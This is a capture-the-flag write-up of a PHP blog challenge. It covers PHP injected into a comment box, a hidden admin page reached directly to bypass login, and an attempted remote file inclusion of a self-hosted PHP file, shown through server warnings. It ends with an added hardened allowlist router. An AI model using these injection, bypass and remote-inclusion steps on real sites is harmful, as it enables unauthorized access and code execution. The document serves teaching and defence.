This challenge has 3 flags, and I've managed to get 2 of them so far:
The "blog post" indicates that the site is powered by PHP. So what happens if we just include some PHP in the comment input box?
<?php echo '<p>Hello World</p>'; ?>
Looking at the page source shows a commented-out anchor:
<h3>Comments</h3> <!--<a href="?page=admin.auth.inc">Admin login</a>-->
Loading that path brings up an admin login page. No flag yet, but what if we try just admin.inc? Second flag! And we can approve comments, that's handy!
What are we going to do for the final flag? SQL injection on the login page? XSS in a comment? Maybe we can upload a file and include it? If we can include a remote PHP file maybe we could host it ourselves and inject some code for the target to execute.
Notice: Undefined variable: title in /app/index.php on line 30
Warning: include(http://4d4ms.com/lee.php): failed to open stream: Connection refused in /app/index.php on line 21
Warning: include(): Failed opening 'http://4d4ms.com/lee.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /app/index.php on line 21
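The warnings above show index.php handing a request-controlled value to include(), which is also why admin.inc could be loaded without going through the login page. The following is an added example, not code from the challenge or from this write-up, of a page router that closes both paths with an allowlist; the page names other than admin.auth.inc and admin.inc, the requires-auth flags, and the pages directory are assumptions.

```php
<?php
// Added illustration, not the challenge's index.php. Page names, the
// requires-auth flags and the pages directory are assumptions.

// Pattern the warnings point to: the parameter goes straight into include(),
// so an internal name such as "admin.inc" or a URL is accepted.
//   include($_GET['page'] . '.php');

// Hardened: public name => [fixed file, needs an authenticated admin session].
const PAGES = [
    'home'           => ['home.php', false],
    'admin.auth.inc' => ['admin.auth.inc.php', false],  // login form
    'admin.inc'      => ['admin.inc.php', true],        // comment moderation
];

function resolve_page(string $requested, string $baseDir, bool $isAdmin): ?string
{
    if (!array_key_exists($requested, PAGES)) {
        return null;                    // unknown names, URLs, traversal
    }
    [$file, $needsAdmin] = PAGES[$requested];
    if ($needsAdmin && !$isAdmin) {
        return null;                    // admin page without a session
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $file);
    // Defence in depth: the file must exist and resolve inside $baseDir.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;                       // safe to pass to include()
}

// Constructed demo: temporary page files and sample requests.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_demo';
if (!is_dir($dir)) { mkdir($dir); }
foreach (PAGES as [$file, $unused]) { touch($dir . DIRECTORY_SEPARATOR . $file); }

foreach (['home', 'admin.auth.inc', 'admin.inc', 'http://example.test/x', '../index'] as $p) {
    $verdict = resolve_page($p, $dir, false) === null ? 'rejected' : 'allowed';
    printf("%-24s %s\n", $p, $verdict);
}
```

With no admin session, only home and admin.auth.inc resolve. Keeping allow_url_include set to Off in php.ini (the default) additionally stops include() from fetching http:// URLs at all.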